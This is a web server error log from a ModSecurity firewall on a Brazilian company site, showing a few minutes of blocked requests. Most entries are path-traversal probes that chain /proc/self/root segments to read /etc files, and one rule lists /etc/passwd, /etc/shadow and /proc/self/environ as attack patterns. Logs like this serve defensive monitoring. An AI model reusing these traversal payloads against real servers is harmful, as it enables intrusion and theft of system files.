[Fri Mar 20 12:09:36.917406 2026] [:error] [pid 7235:tid 140411691570944] [client 74.7.228.61:33524] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1jMPqxLDW4GITHUkQgxQAAAQY"]
[Fri Mar 20 12:10:22.883985 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.241.31:42078] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jXda6ubjKNq_cu4YTCQAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:10:28.820273 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.241.31:54908] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jZNa6ubjKNq_cu4YTDwAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:10:36.687234 2026] [:error] [pid 10189:tid 140411733534464] [client 74.7.241.31:43994] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jbDJ3M9BSuKP7CAZfWQAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:10:39.083892 2026] [:error] [pid 10189:tid 140411674785536] [client 74.7.241.31:42362] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jbjJ3M9BSuKP7CAZfXAAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:10:43.032022 2026] [:error] [pid 7893:tid 140411607643904] [client 74.7.241.31:42372] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jcBCii7xarUs8iHag-wAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:10:56.335298 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.241.31:42382] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jgNa6ubjKNq_cu4YTIQAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:11:04.742850 2026] [:error] [pid 21219:tid 140411733534464] [client 57.141.18.9:55632] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grafana-agent.yaml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1jiPXLqtnMIWvjpaLSxwAAAoE"]
[Fri Mar 20 12:11:05.298949 2026] [:error] [pid 31215:tid 140411708356352] [client 74.7.244.43:60964] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1jiQF0L0L-SsrnPo6edwAAAsQ"]
[Fri Mar 20 12:11:13.381306 2026] [:error] [pid 10189:tid 140411725141760] [client 74.7.241.31:38874] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jkTJ3M9BSuKP7CAZfhQAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:11:26.803428 2026] [:error] [pid 11167:tid 140411725141760] [client 74.7.241.31:59078] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jnvHIg5MgXLBnicMq0AAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 12:11:30.267011 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.241.31:44580] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jota6ubjKNq_cu4YTNwAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:11:32.739331 2026] [:error] [pid 31215:tid 140411557287680] [client 74.7.241.31:44594] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jowF0L0L-SsrnPo6efAAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:11:34.283786 2026] [:error] [pid 21219:tid 140411548894976] [client 74.7.241.31:44596] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/chrony.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jpvXLqtnMIWvjpaLS1QAAApc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:11:36.273526 2026] [:error] [pid 10189:tid 140411658000128] [client 74.7.241.31:44602] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jpzJ3M9BSuKP7CAZfoQAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:11:41.118964 2026] [:error] [pid 7893:tid 140411658000128] [client 74.7.241.31:48482] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jrRCii7xarUs8iHahFQAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:11:42.475114 2026] [:error] [pid 10189:tid 140411557287680] [client 74.7.241.31:48496] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jrjJ3M9BSuKP7CAZfpwAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:11:44.880341 2026] [:error] [pid 7235:tid 140411699963648] [client 74.7.241.31:48504] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jsPqxLDW4GITHUkQhUQAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:11:48.341504 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.241.31:48514] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jtNa6ubjKNq_cu4YTSgAAA0Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:11:50.101254 2026] [:error] [pid 11167:tid 140411565680384] [client 74.7.241.31:60540] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jtfHIg5MgXLBnicMq2gAAAdU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:11:53.856131 2026] [:error] [pid 7893:tid 140411540502272] [client 74.7.241.31:60548] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1juRCii7xarUs8iHahHgAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:11:55.936873 2026] [:error] [pid 11167:tid 140411699963648] [client 57.141.18.72:57130] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1ju_HIg5MgXLBnicMq4gAAAcU"]
[Fri Mar 20 12:11:56.300498 2026] [:error] [pid 10189:tid 140411666392832] [client 74.7.241.31:60562] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jvDJ3M9BSuKP7CAZfrgAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:11:57.612898 2026] [:error] [pid 11167:tid 140411691570944] [client 74.7.241.31:59470] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1jvfHIg5MgXLBnicMq4wAAAcY"], referer: 